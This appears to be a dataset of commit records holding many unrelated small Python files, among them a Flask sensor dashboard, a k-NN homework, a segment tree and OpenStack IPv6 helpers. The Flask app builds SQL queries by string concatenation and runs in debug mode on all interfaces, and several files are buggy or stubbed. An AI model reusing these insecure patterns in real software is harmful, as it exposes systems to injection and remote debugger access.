84be951a9160e9998f3ed702542cee7274081091 | Create __init__.py | parrisha/raspi-visualizer | spectrum/__init__.py | spectrum/__init__.py | mit | Python | ||
92fde42097c4e0abbf5a7835a72f58f52c9b8499 | Create example.py | Peter9192/MAQ_PhD,Peter9192/MAQ_PhD | Python/example.py | Python/example.py | #This is an example script.
| mit | Python | |
3a56b89aacad2f948bf85b78c0834edf7c8d8d01 | Add missing file. | jonathanj/renamer,jonathanj/renamer | renamer/util.py | renamer/util.py | import re
class ConditionalReplacer(object):
    """Apply a regex substitution only when a predicate input matches.

    ``replace`` rewrites *input* with ``regex``/``repl``, but only when
    ``cond`` matches *predInput*; otherwise *input* is returned untouched.
    """
    # Whether a substitution replaces every occurrence (True) or only the
    # first (False).  The original code read this attribute without ever
    # defining it, so every replace() call raised AttributeError; a class
    # default restores the intended behavior.  Defaulting to False keeps
    # re.sub's count argument at 1 -- confirm against callers.
    globalReplace = False

    def __init__(self, cond, regex, repl):
        super(ConditionalReplacer, self).__init__()
        self.cond = re.compile(cond)
        self.regex = re.compile(regex)
        self.repl = repl

    @classmethod
    def fromString(cls, s):
        """Build a replacer from a ``cond<TAB>regex<TAB>repl`` line."""
        return cls(*s.strip().split('\t'))

    def replace(self, input, predInput):
        """Return *input* rewritten, or unchanged when ``cond`` misses *predInput*."""
        if self.cond.search(predInput) is None:
            return input
        # re.sub treats count 0 as "replace all", so a truthy globalReplace
        # maps to 0 and a falsy one to 1 (first occurrence only).
        return self.regex.sub(self.repl, input, int(not self.globalReplace))
class Replacer(ConditionalReplacer):
    """An unconditional replacer: the condition always matches."""
    def __init__(self, regex, replace):
        # r'.*' matches any predicate input, making the condition a no-op.
        super(Replacer, self).__init__(r'.*', regex, replace)
    def replace(self, input, predInput):
        # The predicate is irrelevant here; pass input for both arguments.
        return super(Replacer, self).replace(input, input)
class Replacement(object):
    """An ordered pipeline of replacers applied to an input string."""

    def __init__(self, replacers):
        super(Replacement, self).__init__()
        self.replacers = replacers

    @classmethod
    def fromFile(cls, fd, replacerType=Replacer):
        """Parse one replacer per line of *fd*; ``None`` yields an empty pipeline."""
        if fd is None:
            return cls([])
        return cls([replacerType.fromString(line) for line in fd])

    def add(self, replacer):
        """Append *replacer* to the end of the pipeline."""
        self.replacers.append(replacer)

    def replace(self, input, predInput=None):
        """Run *input* through every replacer; *predInput* defaults to *input*."""
        if predInput is None:
            predInput = input
        result = input
        for rule in self.replacers:
            result = rule.replace(result, predInput)
        return result
| mit | Python | |
066673aea6887d9272646d8bac8f99c69387e61d | add management command to check the status of a bounced email | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | corehq/util/management/commands/check_bounced_email.py | corehq/util/management/commands/check_bounced_email.py | from django.core.management.base import BaseCommand
from corehq.util.models import (
BouncedEmail,
PermanentBounceMeta,
ComplaintBounceMeta,
)
class Command(BaseCommand):
    help = "Check on the bounced status of an email"
    def add_arguments(self, parser):
        """Register the positional email and the optional --show-details flag."""
        parser.add_argument('bounced_email')
        parser.add_argument(
            '--show-details',
            action='store_true',
            default=False,
            help='Show extra details of bounced messages',
        )
    def handle(self, bounced_email, **options):
        """Print any permanent-bounce and complaint records for *bounced_email*."""
        is_bounced = BouncedEmail.objects.filter(email=bounced_email).exists()
        show_details = options['show_details']
        if not is_bounced:
            self.stdout.write(f'\n{bounced_email} is NOT bouncing. '
                              f'All clear!\n\n')
            return
        # Banner marking the address as bouncing.
        self.stdout.write('\n\n')
        self.stdout.write('*' * 200)
        self.stdout.write(f'! YES, {bounced_email} is marked as bounced\n')
        self.stdout.write('*' * 200)
        self.stdout.write('\n')
        permanent_bounces = PermanentBounceMeta.objects.filter(
            bounced_email__email=bounced_email).all()
        if permanent_bounces:
            self.stdout.write('The following Permanent Bounce '
                              'records were found:')
            self.stdout.write('\nSub-Type\tSNS Timestamp'
                              '\t\t\tCreated on HQ\t\t\tReason')
            self.stdout.write('.' * 200)
            for record in permanent_bounces:
                self.stdout.write(f'{record.sub_type}'
                                  f'\t\t{record.timestamp}'
                                  f'\t{record.created}'
                                  f'\t{record.reason}')
                if show_details:
                    # NOTE(review): this unpacking assumes `headers` iterates
                    # as (key, value) pairs; a plain dict would yield only
                    # keys here -- confirm the model field's type.
                    for key, val in record.headers:
                        self.stdout.write(f'\t\t{key}:\t{val}')
                    self.stdout.write(f'\t\tdestination:\t{record.destination}')
            self.stdout.write('\n\n')
        complaints = ComplaintBounceMeta.objects.filter(
            bounced_email__email=bounced_email).all()
        if complaints:
            self.stdout.write('The following Complaint '
                              'records were found:')
            self.stdout.write('\nSNS Timestamp'
                              '\t\t\tCreated on HQ'
                              '\t\t\tFeedback Type'
                              '\t\tSub-Type'
                              '\tDestination')
            self.stdout.write('.' * 200)
            for record in complaints:
                self.stdout.write(f'{record.timestamp}'
                                  f'\t{record.created}'
                                  f'\t{record.feedback_type}'
                                  f'\t{record.sub_type}'
                                  f'\t{record.destination}')
                if show_details:
                    # NOTE(review): same (key, value) assumption as above.
                    for key, val in record.headers:
                        self.stdout.write(f'\t\t{key}:\t{val}')
                # NOTE(review): unlike the permanent-bounce section, this
                # blank separator is written once per record -- confirm
                # whether that asymmetry is intended.
                self.stdout.write('\n\n')
| bsd-3-clause | Python | |
fea6011cf14e87492d511db3ed9415f5938929bf | add ex8 | AisakaTiger/Learn-Python-The-Hard-Way,AisakaTiger/Learn-Python-The-Hard-Way | ex8.py | ex8.py | formatter = "%r %r %r %r"
# Demonstrates %r ("raw" repr) string formatting with Python 2 print
# statements.  `formatter` ("%r %r %r %r") is defined just above this chunk.
print formatter %(1, 2, 3, 4)
print formatter % ("one", "two", "three", "four")
print formatter %(True, False, False, True)
# A format string can even format itself.
print formatter %(formatter, formatter, formatter,formatter)
# The argument tuple may span multiple lines.
print formatter % (
    "I had this thing.",
    "That you could type up right",
    "But it did't sing.",
    "So I said goodnight."
)
| mit | Python | |
2ea014495f559072c5ecfac0b1117979793cf042 | Create ruuvitag-web.py | dimamedia/RuuviTag-logger,dimamedia/RuuviTag-logger | ruuvitag-web.py | ruuvitag-web.py | #!/usr/bin/python3
from flask import Flask, render_template
from datetime import datetime, timedelta
import sqlite3
import json
import random
app = Flask(__name__)
def randomRGB():
    """Return a random opaque color as an (r, g, b, alpha) tuple."""
    channels = tuple(random.randint(0, 255) for _ in range(3))
    # Alpha is fixed at 1 (fully opaque).
    return channels + (1,)
@app.route('/')
def index():
    """Render Chart.js datasets for the last N days of RuuviTag readings."""
    conn = sqlite3.connect("ruuvitag.db")
    # sqlite3.Row lets the result rows be accessed by column name.
    conn.row_factory = sqlite3.Row
    # set how many days you want to see in charts
    N = 30 # show charts for 30 days
    date_N_days_ago = str(datetime.now() - timedelta(days=N))
    # SECURITY NOTE(review): SQL is built by string concatenation.  The
    # concatenated values are generated locally here, but parameterized
    # queries ("... > ?") would be safer and are recommended.
    tags = conn.execute("SELECT DISTINCT mac, name FROM sensors WHERE timestamp > '"+date_N_days_ago+"' ORDER BY name, timestamp DESC")
    sensors = ['temperature', 'humidity', 'pressure']
    sList = {}
    datasets = {}
    for sensor in sensors:
        datasets[sensor] = []
    for tag in tags:
        # Only tags with a configured name are charted.
        if tag['name']:
            sList['timestamp'] = []
            for sensor in sensors:
                sList[sensor] = []
            sData = conn.execute("SELECT timestamp, temperature, humidity, pressure FROM sensors WHERE mac = '"+tag['mac']+"' AND timestamp > '"+date_N_days_ago+"' ORDER BY timestamp")
            for sRow in sData:
                sList['timestamp'].append(str(sRow['timestamp'])[:-3]) # remove seconds from timestamp
                for sensor in sensors:
                    sList[sensor].append(sRow[sensor])
            color = randomRGB()
            # Chart.js dataset fragment; {{ }} escape literal braces for
            # str.format below.
            dataset = """{{
                label: '{}',
                borderColor: 'rgba{}',
                fill: false,
                lineTension: 0.2,
                data: {}
            }}"""
            for sensor in sensors:
                datasets[sensor].append(dataset.format(tag['name'], color, sList[sensor]))
    conn.close()
    # NOTE(review): if no tag has a name, sList['timestamp'] was never set
    # and the line below raises KeyError -- confirm this cannot happen.
    return render_template('ruuvitag.html', time = sList['timestamp'], temperature = datasets['temperature'], humidity = datasets['humidity'], pressure = datasets['pressure'])
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=int('80'))
| mit | Python | |
2becf3b5223da8dc8d312462ae84f32ec3aff129 | Create hw1.py | yl9jv/assignment_1 | hw1.py | hw1.py | # Name: Yicheng Liang
# Computing ID: yl9jv
# k-nearest-neighbors classifier over 2-D points read from a file
# (Python 2: print statements and raw_input).
import math
# Read and validate k (neighbor count) and M (max data rows to load).
k = raw_input("Please enter the value for k: ")
while (not k.isdigit()):
    k = raw_input("Please enter a number for k: ")
k = int(k)
m = raw_input("Please enter the value for M: ")
while (not m.isdigit()):
    m = raw_input("Please enter a number for M: ")
m = int(m)
# Load up to M rows of "category x y" from the data file.
items = []
filename = raw_input("Please enter the file name: ")
f = open(filename, 'r')
while (m > 0):
    line = f.readline()
    if line == "":
        break
    else:
        m -= 1
        temp = line.split()
        items.append((temp[0], float(temp[1]), float(temp[2])))
new_item = raw_input("Please enter the values for x and y: ")
temp = new_item.split()
x = float(temp[0])
y = float(temp[1])
# Classify query points until either coordinate equals 1.0 (sentinel).
while (x != 1.0 and y != 1.0):
    # Euclidean distance from the query to every loaded item.
    neighbors = []
    for item in items:
        distance = math.sqrt(math.pow((x - item[1]), 2) + math.pow((y - item[2]), 2))
        neighbors.append((item[0], item[1], item[2], distance))
    neighbors = sorted(neighbors, key=lambda a:a[3])
    counter = 0
    cat1 = ""
    cat2 = ""
    num_cat1 = 0
    num_cat2 = 0
    cat1_distance = 0
    cat2_distance = 0
    print "(1) nearest neighbors: "
    k_NN = []
    # Tally the two categories among the k nearest neighbors.
    while counter != k:
        print neighbors[counter]
        if cat1 == "":
            cat1 = neighbors[counter][0]
            num_cat1 += 1
            cat1_distance += neighbors[counter][3]
        elif (cat1 != neighbors[counter][0] and cat2 == ""):
            cat2 = neighbors[counter][0]
            num_cat2 += 1
            cat2_distance += neighbors[counter][3]
        elif cat1 == neighbors[counter][0]:
            num_cat1 += 1
            cat1_distance += neighbors[counter][3]
        elif cat2 == neighbors[counter][0]:
            num_cat2 += 1
            cat2_distance += neighbors[counter][3]
        counter += 1
        # NOTE(review): this appends neighbors[counter] AFTER the increment,
        # i.e. the (counter+1)-th neighbor, and can raise IndexError when
        # counter reaches the list length; k_NN is also never used.
        k_NN.append(neighbors[counter])
    print ''
    # Majority vote between the two observed categories (ties go to cat1).
    if num_cat1 < num_cat2:
        print "(2)point classified as: " + cat2
    else:
        print "(2)point classified as: " + cat1
    print ''
    print "(3) average distance from " + cat1 + " is: " + str(cat1_distance / num_cat1)
    print "    average distance from " + cat2 + " is: " + str(cat2_distance / num_cat2)
    print ""
    print ""
    new_item = raw_input("Please enter the values for x and y: ")
    temp = new_item.split()
    x = float(temp[0])
    y = float(temp[1])
| mit | Python | |
6274ee8d776c829998dfaa56cb419d1263242a48 | Add topological sorting in Python | salman-bhai/DS-Algo-Handbook,salman-bhai/DS-Algo-Handbook,salman-bhai/DS-Algo-Handbook,salman-bhai/DS-Algo-Handbook | Algorithms/Sort_Algorithms/Topological_Sort/TopologicalSort.py | Algorithms/Sort_Algorithms/Topological_Sort/TopologicalSort.py | '''
Topological sort.
Taken from :
http://stackoverflow.com/questions/15038876/topological-sort-python
'''
from collections import defaultdict
from itertools import takewhile, count
def sort_topologically(graph):
    """Group the graph's nodes into dependency levels.

    Each element of the returned list is a set of node names; a node's
    level is the length of the longest path from it to a sink, so the
    first set holds the sinks and every set depends only on earlier ones.
    """
    level_of = {}
    members_of = defaultdict(set)

    def assign_level(node):
        # Memoized depth-first walk: a node's level is one more than the
        # deepest level among its children (0 for childless nodes).
        if node in level_of:
            return level_of[node]
        children = graph.get(node, None)
        if not children:
            depth = 0
        else:
            depth = 1 + max(assign_level(child) for child in children)
        level_of[node] = depth
        members_of[depth].add(node)
        return depth

    for node in graph:
        assign_level(node)

    levels = (members_of.get(i, None) for i in count())
    return list(takewhile(lambda s: s is not None, levels))
# Demo adjacency list: node 1 depends on 2 and 3, ..., node 6 is the sink.
graph = {
    1: [2, 3],
    2: [4, 5, 6],
    3: [4,6],
    4: [5,6],
    5: [6],
    6: []
}
print(sort_topologically(graph)) | mit | Python | |
df52febb14761d741a20dcdc1cbfd5ea8cd7e07b | add my bing script as an example | aliclark/irctail,aliclark/irctail | bingaling.aclark.py | bingaling.aclark.py | #!/usr/bin/python
import re
import baseformat
import bingaling
bingcheck_restr = r'([a4][c][l1][a4][r][k])|([a4][l1][i1])'
bingcheck_full = re.compile(r'(('+'\x04\x65'+r')|('+'\x04\x63'r')|([^\w\-'+'\x04'+r'])|(^)|(\t))(' + bingcheck_restr + r')(([^\w\-])|($))', re.IGNORECASE)
def bingcheck(line):
    """Highlight nickname matches in an IRC line and mail the original line.

    Splits the line with the project-local ``baseformat.splitter``; when it
    matches, only the message part (group 5) is rewritten, preserving the
    prefix/timestamp groups.  The \\x16 bytes toggle IRC reverse-video
    around the matched nick.
    """
    r = baseformat.splitter.match(line)
    if r:
        sub = r.group(3) + '\t' + r.group(4) + '\t' + re.sub(bingcheck_full, '\\1\x16\\7\x16\\11', r.group(5));
        if r.group(1):
            sub = r.group(1) + sub
    else:
        # Unstructured line: highlight across the whole line.
        sub = re.sub(bingcheck_full, '\x16\\7\x16', line);
    if sub != line:
        # A substitution happened, i.e. the nick was mentioned: notify.
        bingaling.sendmail(line)
    return sub
def main():
    """Run the bingaling pipe with this module's highlight callback."""
    bingaling.bingpipe(bingcheck)
if __name__ == '__main__':
main()
| isc | Python | |
d95732ce90c5c9ac571ffc78b45eaa4424a11038 | Create nested_scrape.py | wolfdale/Scraper | nested_scrape.py | nested_scrape.py | """ PROJECT SCRAPER """
from bs4 import BeautifulSoup
import urllib2
def scraper(url, outer_tag, outer_attr, outer_attr_name, inner_tag, inner_attr, inner_attr_name):
''' BEAUTIFUL SOUP INIT '''
web=urllib2.urlopen(url)
soup=BeautifulSoup(web,'html.parser',from_encoding='utf-8')
''' ***** CONTENT LIST ***** '''
content=[]
for outer_ in soup.find_all(outer_tag,{outer_attr : outer_attr_name}):
for inner_ in outer_.find_all( inner_tag,{inner_attr : inner_attr_name}):
content.append(inner_.text.encode('utf-8'))
print content
def decode_prams():
pass
if __name__=='__main__':
print 'url'
url=raw_input()
print 'outer tag name'
outer_tag=raw_input()
print ' outer attr'
outer_attr=raw_input()
print 'outer attr name'
outer_attr_name=raw_input()
print 'inner tag'
inner_tag=raw_input()
print 'inner attr'
inner_attr=raw_input()
print 'inner attr name'
inner_attr_name=raw_input()
scraper(url, outer_tag, outer_attr, outer_attr_name, inner_tag, inner_attr, inner_attr_name)
| mit | Python | |
d2ed4e7a0d8edafa250044e8b9ecf319c14b85e0 | add pkc.py | concise/ecclab | pkc.py | pkc.py | class PkcError(BaseException):
pass
class PkcTypeError(TypeError, PkcError):
    """Raised when an argument is not of the required type (bytes)."""
    pass
class PkcCertificateError(ValueError, PkcError):
    """Raised for malformed or invalid certificate values."""
    pass
class PkcPublickeyError(ValueError, PkcError):
    """Raised for malformed or invalid public-key values."""
    pass
def pkc_extract_publickey_from_certificate(certificate):
    """Extract the public key from *certificate*; argument must be bytes."""
    # Guard clause: reject anything that is not exactly bytes.
    if type(certificate) is not bytes:
        raise PkcTypeError
    return _pkc_extract_publickey_from_certificate(certificate)
def pkc_compress_publickey(publickey):
    """Return the compressed form of *publickey*; argument must be bytes."""
    # Guard clause: reject anything that is not exactly bytes.
    if type(publickey) is not bytes:
        raise PkcTypeError
    return _pkc_compress_publickey(publickey)
def pkc_verify_signature(publickey, message, signatures):
    """Verify *signatures* over *message* with *publickey*; all must be bytes."""
    args_are_bytes = (type(publickey) is bytes
                      and type(message) is bytes
                      and type(signatures) is bytes)
    if not args_are_bytes:
        raise PkcTypeError
    return _pkc_verify_signature(publickey, message, signatures)
def _pkc_extract_publickey_from_certificate(certificate_bytes):
    # TODO: not implemented yet -- currently returns None implicitly.
    pass
def _pkc_compress_publickey(publickey_bytes):
    # TODO: not implemented yet -- currently returns None implicitly.
    pass
def _pkc_verify_signature(publickey_bytes, message_bytes, signatures_bytes):
    # TODO: not implemented yet -- currently returns None implicitly.
    pass
| mit | Python | |
b716ae64ec574d741386b1dfc18c76e9bddec9a0 | add closure example | dekstop/ipython_extensions,dekstop/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,danielballan/ipython_extensions,minrk/ipython_extensions,NunoEdgarGub1/ipython_extensions,danielballan/ipython_extensions,danielballan/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions | closure.py | closure.py | """
%%closure cell magic for running the cell in a function,
reducing pollution of the namespace
%%forget does the same thing, but explicitly deletes new names,
rather than wrapping the cell in a function.
"""
from IPython.utils.text import indent
def closure(line, cell):
    """run the cell in a function, generating a closure
    avoids affecting the user's namespace
    """
    ip = get_ipython()
    func_name = "_closure_magic_f"
    # Wrap the cell body in a temporary function and call it immediately,
    # so names assigned in the cell stay function-local.
    block = '\n'.join([
        "def %s():" % func_name,
        indent(cell),
        "%s()" % func_name
    ])
    ip.run_cell(block)
    # Remove the temporary function itself from the user namespace.
    ip.user_ns.pop(func_name, None)
def forget(line, cell):
    """cleanup any new variables defined in the cell
    avoids UnboundLocals that might show up in %%closure
    changes to existing variables are not affected
    """
    ip = get_ipython()
    # Snapshot the namespace keys, run the cell, then delete whatever names
    # the cell introduced.  Rebinding of pre-existing names is kept.
    before = set(ip.user_ns.keys())
    ip.run_cell(cell)
    after = set(ip.user_ns.keys())
    for key in after.difference(before):
        ip.user_ns.pop(key)
def load_ipython_extension(ip):
    """IPython extension hook: register %%closure and %%forget cell magics."""
    mm = ip.magics_manager
    mm.register_function(closure, 'cell')
    mm.register_function(forget, 'cell')
| bsd-3-clause | Python | |
7d28f97fb16684c58cf9e55bcca213e853741ca4 | Create rmq.py | andymitrich/stepic,andymitrich/stepic | rmq.py | rmq.py | #!/usr/local/bin/python3
from sys import stdin
from math import ceil, log
from decimal import Decimal as d
class RMQ(object):
    """Range-minimum query over a list of numbers, backed by a segment tree.

    The tree lives in ``self.e`` as a 1-based implicit binary heap: node
    ``i`` covers its children ``2*i`` and ``2*i + 1``; the ``self.size``
    leaves sit at indices ``self.size .. 2*self.size - 1``.  Unused leaf
    slots are padded with Decimal('Infinity') so they never win a min.

    The original implementation was a non-functional stub: ``__init__``
    called ``len()`` with no argument, never filled ``self.e``, and
    ``min``/``set`` were unimplemented.  Positions here are 0-based and
    query ranges are inclusive.
    """

    def __init__(self, numbers):
        n = len(numbers)
        # Round the leaf count up to a power of two (at least 1) so the
        # tree is perfect; the caller's list is not mutated (the original
        # appended padding directly into it).
        size = 1
        while size < n:
            size *= 2
        self.size = size
        self.e = [d('Infinity')] * (2 * size)
        self.e[size:size + n] = numbers
        self.build()

    def build(self):
        """(Re)compute every internal node as the min of its two children."""
        for idx in range(self.size - 1, 0, -1):
            self.e[idx] = min(self.e[2 * idx], self.e[2 * idx + 1])

    def min(self, left, right):
        """Return the minimum over the inclusive 0-based range [left, right]."""
        lo = left + self.size
        hi = right + self.size
        best = d('Infinity')
        while lo <= hi:
            if lo % 2 == 1:
                # lo is a right child: take it alone and step past it.
                best = min(best, self.e[lo])
                lo += 1
            if hi % 2 == 0:
                # hi is a left child: take it alone and step past it.
                best = min(best, self.e[hi])
                hi -= 1
            lo //= 2
            hi //= 2
        return best

    def set(self, origin, value):
        """Assign *value* to 0-based position *origin* and repair the tree path."""
        idx = origin + self.size
        self.e[idx] = value
        idx //= 2
        while idx >= 1:
            self.e[idx] = min(self.e[2 * idx], self.e[2 * idx + 1])
            idx //= 2
if __name__ == '__main__':
    # Input format: first line "n m", second line n numbers, then m
    # commands of the form "Min l r" or "Set i v".
    # Use a context manager so the input file is always closed.
    with open('input.txt', 'r') as f:
        n, m = map(int, f.readline().split())
        numbers = list(map(int, f.readline().split()))
        rmq = RMQ(numbers)
        for _ in range(m):
            c, x, y = f.readline().split()
            # The arguments arrive as strings; the original passed them to
            # min()/set() unconverted, which would break any arithmetic.
            x, y = int(x), int(y)
            if c == 'Min':
                # Presumably the query answer should be reported; the
                # original discarded it -- confirm the expected output format.
                print(rmq.min(x, y))
            elif c == 'Set':
                rmq.set(x, y)
| mit | Python | |
3d1cef9e56d7fac8a1b89861b7443e4ca660e4a8 | Reduce indentation to avoid PEP8 failures | vmturbo/nova,fnordahl/nova,cloudbau/nova,CEG-FYP-OpenStack/scheduler,vladikr/nova_drafts,yrobla/nova,bigswitch/nova,eharney/nova,KarimAllah/nova,Stavitsky/nova,TwinkleChawla/nova,zzicewind/nova,klmitch/nova,rickerc/nova_audit,belmiromoreira/nova,cloudbase/nova-virtualbox,luogangyi/bcec-nova,Yusuke1987/openstack_template,eneabio/nova,SUSE-Cloud/nova,nikesh-mahalka/nova,fajoy/nova,petrutlucian94/nova_dev,gooddata/openstack-nova,NewpTone/stacklab-nova,Juniper/nova,NoBodyCam/TftpPxeBootBareMetal,sebrandon1/nova,shail2810/nova,usc-isi/extra-specs,orbitfp7/nova,usc-isi/nova,yatinkumbhare/openstack-nova,spring-week-topos/nova-week,yrobla/nova,usc-isi/nova,joker946/nova,usc-isi/extra-specs,apporc/nova,tanglei528/nova,klmitch/nova,cernops/nova,varunarya10/nova_test_latest,salv-orlando/MyRepo,blueboxgroup/nova,BeyondTheClouds/nova,watonyweng/nova,akash1808/nova_test_latest,angdraug/nova,dims/nova,sebrandon1/nova,sridevikoushik31/nova,bgxavier/nova,superstack/nova,ntt-sic/nova,gspilio/nova,NewpTone/stacklab-nova,viggates/nova,adelina-t/nova,maheshp/novatest,varunarya10/nova_test_latest,CiscoSystems/nova,orbitfp7/nova,fajoy/nova,usc-isi/nova,silenceli/nova,psiwczak/openstack,akash1808/nova,mgagne/nova,fnordahl/nova,luogangyi/bcec-nova,NoBodyCam/TftpPxeBootBareMetal,redhat-openstack/nova,NeCTAR-RC/nova,cloudbase/nova,virtualopensystems/nova,mikalstill/nova,cloudbase/nova,CEG-FYP-OpenStack/scheduler,scripnichenko/nova,superstack/nova,DirectXMan12/nova-hacking,edulramirez/nova,houshengbo/nova_vmware_compute_driver,Yuriy-Leonov/nova,Stavitsky/nova,usc-isi/extra-specs,double12gzh/nova,eneabio/nova,plumgrid/plumgrid-nova,imsplitbit/nova,mmnelemane/nova,zhimin711/nova,eonpatapon/nova,ted-gould/nova,aristanetworks/arista-ovs-nova,akash1808/nova_test_latest,aristanetworks/arista-ovs-nova,sileht/deb-openstack-nova,yatinkumbhare/openstack-nova,TieWei/nova,raildo/nova,shootstar/novatest,KarimAllah/nova,M
etaswitch/calico-nova,maheshp/novatest,jianghuaw/nova,josephsuh/extra-specs,adelina-t/nova,Juniper/nova,yosshy/nova,whitepages/nova,affo/nova,yrobla/nova,silenceli/nova,bigswitch/nova,whitepages/nova,tudorvio/nova,openstack/nova,phenoxim/nova,CloudServer/nova,joker946/nova,mikalstill/nova,maoy/zknova,bgxavier/nova,citrix-openstack-build/nova,aristanetworks/arista-ovs-nova,dims/nova,gooddata/openstack-nova,devendermishrajio/nova_test_latest,thomasem/nova,NewpTone/stacklab-nova,qwefi/nova,dstroppa/openstack-smartos-nova-grizzly,MountainWei/nova,eayunstack/nova,maoy/zknova,zzicewind/nova,rajalokan/nova,CCI-MOC/nova,mahak/nova,Yusuke1987/openstack_template,saleemjaveds/https-github.com-openstack-nova,kimjaejoong/nova,cloudbase/nova-virtualbox,zhimin711/nova,Juniper/nova,Tehsmash/nova,Francis-Liu/animated-broccoli,phenoxim/nova,JioCloud/nova_test_latest,rahulunair/nova,citrix-openstack-build/nova,badock/nova,petrutlucian94/nova,Triv90/Nova,JianyuWang/nova,sridevikoushik31/nova,apporc/nova,dawnpower/nova,psiwczak/openstack,JioCloud/nova,rajalokan/nova,hanlind/nova,DirectXMan12/nova-hacking,vladikr/nova_drafts,tangfeixiong/nova,eonpatapon/nova,mahak/nova,sileht/deb-openstack-nova,JioCloud/nova_test_latest,leilihh/nova,alexandrucoman/vbox-nova-driver,savi-dev/nova,barnsnake351/nova,jeffrey4l/nova,gspilio/nova,Triv90/Nova,viggates/nova,j-carpentier/nova,klmitch/nova,mikalstill/nova,thomasem/nova,cyx1231st/nova,scripnichenko/nova,josephsuh/extra-specs,sileht/deb-openstack-nova,MountainWei/nova,CCI-MOC/nova,badock/nova,imsplitbit/nova,Metaswitch/calico-nova,leilihh/novaha,russellb/nova,klmitch/nova,shootstar/novatest,JioCloud/nova,rajalokan/nova,ted-gould/nova,BeyondTheClouds/nova,kimjaejoong/nova,rajalokan/nova,rrader/nova-docker-plugin,psiwczak/openstack,CiscoSystems/nova,bclau/nova,watonyweng/nova,maoy/zknova,alvarolopez/nova,devoid/nova,cernops/nova,qwefi/nova,josephsuh/extra-specs,rahulunair/nova,tanglei528/nova,ruslanloman/nova,eneabio/nova,nikesh-mahalka/nova,SUSE-Cloud
/nova,vmturbo/nova,jeffrey4l/nova,takeshineshiro/nova,salv-orlando/MyRepo,paulmathews/nova,tianweizhang/nova,dawnpower/nova,devoid/nova,houshengbo/nova_vmware_compute_driver,NoBodyCam/TftpPxeBootBareMetal,jianghuaw/nova,tealover/nova,superstack/nova,rrader/nova-docker-plugin,KarimAllah/nova,felixma/nova,russellb/nova,NeCTAR-RC/nova,berrange/nova,maelnor/nova,mmnelemane/nova,j-carpentier/nova,eharney/nova,sacharya/nova,alvarolopez/nova,LoHChina/nova,spring-week-topos/nova-week,tealover/nova,virtualopensystems/nova,berrange/nova,edulramirez/nova,russellb/nova,plumgrid/plumgrid-nova,raildo/nova,petrutlucian94/nova_dev,projectcalico/calico-nova,ewindisch/nova,vmturbo/nova,DirectXMan12/nova-hacking,felixma/nova,gspilio/nova,double12gzh/nova,devendermishrajio/nova,jianghuaw/nova,Brocade-OpenSource/OpenStack-DNRM-Nova,sebrandon1/nova,akash1808/nova,saleemjaveds/https-github.com-openstack-nova,cloudbau/nova,blueboxgroup/nova,maelnor/nova,rickerc/nova_audit,CloudServer/nova,tangfeixiong/nova,eayunstack/nova,mgagne/nova,Yuriy-Leonov/nova,shahar-stratoscale/nova,hanlind/nova,TieWei/nova,rahulunair/nova,dstroppa/openstack-smartos-nova-grizzly,alaski/nova,mandeepdhami/nova,Juniper/nova,angdraug/nova,jianghuaw/nova,LoHChina/nova,sridevikoushik31/nova,paulmathews/nova,sridevikoushik31/openstack,iuliat/nova,cloudbase/nova,paulmathews/nova,belmiromoreira/nova,JianyuWang/nova,OpenAcademy-OpenStack/nova-scheduler,Francis-Liu/animated-broccoli,bclau/nova,fajoy/nova,openstack/nova,ntt-sic/nova,ewindisch/nova,leilihh/nova,petrutlucian94/nova,sacharya/nova,sridevikoushik31/nova,openstack/nova,redhat-openstack/nova,OpenAcademy-OpenStack/nova-scheduler,devendermishrajio/nova,savi-dev/nova,TwinkleChawla/nova,sridevikoushik31/openstack,sridevikoushik31/openstack,barnsnake351/nova,alaski/nova,BeyondTheClouds/nova,cernops/nova,isyippee/nova,zaina/nova,noironetworks/nova,Triv90/Nova,zaina/nova,tianweizhang/nova,shail2810/nova,mandeepdhami/nova,yosshy/nova,noironetworks/nova,vmturbo/nova,leilihh/
novaha,projectcalico/calico-nova,maheshp/novatest,houshengbo/nova_vmware_compute_driver,hanlind/nova,iuliat/nova,devendermishrajio/nova_test_latest,alexandrucoman/vbox-nova-driver,isyippee/nova,takeshineshiro/nova,dstroppa/openstack-smartos-nova-grizzly,tudorvio/nova,salv-orlando/MyRepo,mahak/nova,gooddata/openstack-nova,Tehsmash/nova,ruslanloman/nova,affo/nova,savi-dev/nova,shahar-stratoscale/nova,cyx1231st/nova,gooddata/openstack-nova,Brocade-OpenSource/OpenStack-DNRM-Nova | nova/ipv6/api.py | nova/ipv6/api.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Openstack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova import utils
FLAGS = flags.FLAGS
flags.DEFINE_string('ipv6_backend',
'rfc2462',
'Backend to use for IPv6 generation')
def reset_backend():
    """Rebuild the module-level IMPL from the current ``ipv6_backend`` flag.

    Called once at import time (bottom of this module); call it again if
    the flag value changes so the lazily loaded backend is re-selected.
    """
    global IMPL
    IMPL = utils.LazyPluggable(FLAGS['ipv6_backend'],
        rfc2462='nova.ipv6.rfc2462',
        account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
    """Delegate to the configured backend's ``to_global``.

    Presumably derives a global IPv6 address from *prefix*, *mac* and
    *project_id*; exact semantics depend on the selected backend module.
    """
    return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
    """Delegate to the configured backend's ``to_mac`` for *ipv6_address*."""
    return IMPL.to_mac(ipv6_address)
reset_backend()
| # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Openstack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
